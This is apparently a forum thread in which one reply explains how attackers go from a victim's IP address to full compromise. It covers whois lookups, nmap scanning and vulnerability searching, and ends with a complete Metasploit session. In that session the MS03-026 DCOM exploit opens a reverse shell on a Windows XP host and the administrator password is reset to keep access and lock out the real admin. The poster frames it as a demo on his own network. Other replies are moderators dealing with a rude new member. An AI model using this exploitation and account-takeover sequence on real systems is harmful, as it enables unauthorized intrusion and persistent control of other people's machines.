ip addresses

yea i was jwing im cocasion and european so if they want to mess

with me they'll hav to fuck with the whole US. but jwing because people can

easily find out other peeps ip address so i was like thats fucked up if

they can do all this shit


If they have your IP address they can identify the 'target' host(s). How?

(a lots of different ways)one way to do A simple whois query from

http://ws.arin.net/whois can give them this information.


Once they have this information, they can easily fire up their favorite

port scanner nmap, for example, and scan your system to find open ports.

Why are they looking to find open ports?

Because open ports means the system is listening for incomming

connections. ;)


Identify applications,servers, and so on that are running on your system

(based on the open ports they found) again, nmap can do this.


Next, find exploits specific to those applications and servers (if any) on

your system.

Nessus and GFI both free can do this. Metasploit has a nice selection of

exploits. Sites such as;

http://nvd.nist.gov/

http://www.securityfocus.com/

can assist as well.

Next, step Exploit the system.

Metaploit can easily do this.

[*] Starting the Metasploit Framework...



__. .__. .__. __.
_____ _____/ |______ ____________ | | ____ |__|/ |_
/ \_/ __ \ __\__ \ / ___/\____ \| | / _ \| \ __\
| Y Y \ ___/| | / __ \_\___ \ | |_> > |_( <_> ) || |
|__|_| /\___ >__| (____ /____ >| __/|____/\____/|__||__|
\/ \/ \/ \/ |__|


+ -- --=[ msfconsole v2.7 [158 exploits - 76 payloads]

msf > use msrpc_dcom_ms03_026
msf msrpc_dcom_ms03_026 > set PAYLOAD win32_reverse
PAYLOAD -> win32_reverse
msf msrpc_dcom_ms03_026(win32_reverse) > set RHOST 192.168.1.101
RHOST -> 192.168.1.101
msf msrpc_dcom_ms03_026(win32_reverse) > set RPORT 135
RPORT -> 135
msf msrpc_dcom_ms03_026(win32_reverse) > set LHOST 192.168.1.100
LHOST -> 192.168.1.100
msf msrpc_dcom_ms03_026(win32_reverse) > set LPORT 4321
LPORT -> 4321
msf msrpc_dcom_ms03_026(win32_reverse) > exploit
[*] Starting Reverse Handler.
[*] Sending request...
[*] Got connection from 192.168.1.100:4321 <-> 192.168.1.101:3054

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>net users administrator *
Type a password for the user:
Retype the password to confirm:
The command completed successfully.



C:\WINDOWS\system32>Caught interrupt, exit connection? [y/n] y
[*] Exiting Reverse Handler.
msf msrpc_dcom_ms03_026(win32_reverse) >

Box is now owned, and changed the Admin password for later entry into the system and to block out the real admin. This is a little demo on a PC ON my network.
 
yea i was jwing im cocasion and european so if they want to mess with me they'll hav to<<DELETED>> with the whole US. but jwing because people can easily find out other peeps ip address so i was like thats<<DELETED>> up if they can do all this shit

I don't like your attitude, & now I've had to delete offensive words, you only joined today, & if you continue in this vein I will ban you, & that's a promise.
 
He will just create a new account and be back. Did you block his IP address or the entire net-range?

Cheers, 0x0161
 
Back
Top Bottom